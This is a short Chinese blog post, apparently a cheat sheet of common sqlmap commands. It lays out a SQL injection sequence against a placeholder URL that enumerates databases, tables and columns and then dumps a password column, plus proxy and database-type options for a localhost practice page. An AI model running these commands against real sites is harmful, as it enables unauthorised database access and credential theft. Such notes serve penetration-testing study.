zoukankan      html  css  js  c++  java
  • sqlmap常用命令

    ---------------------------------------------------------------------------------------------------------------------------------------------
    (1) 查找数据库

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" --dbs

    (2) 通过1中的数据库查找对应的表 (假如通过1,得到的是dataname)

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname --tables

    (3) 通过2中的数据表得到字段(假如得到的是tablename表)

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T tablename --columns

    (4) 通过3得到字段值(假如从3中得到字段id,password)

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T tablename -C "password" --dump


    -------------------------------------------------------------------------------------------------------------------------------------------
    使用代理

    sqlmap.py -u "http://localhost/sqlzhurulianxi.php?id=1" --proxy=http://127.0.0.1:8080

    指定数据库类型

    sqlmap.py -u “http://localhost/sqlzhurulianxi.php?id=1” --dbms=MySQL

  • 相关阅读:
    自己编译GCC(compile gcc from source)
    sphinx PDF 中文
    rst2pdf 中文
    Pandoc PDF 中文
    Linux XMind
    asp.net 邮件发送类
    asp.net 音乐播放器
    使用X-UA-Compatible来设置IE浏览器兼容模式
    asp.net(c#)网页跳转七种方法小结
    C#中HashTable的用法
  • 原文地址:https://www.cnblogs.com/thespace/p/12335596.html
Copyright © 2011-2022 走看看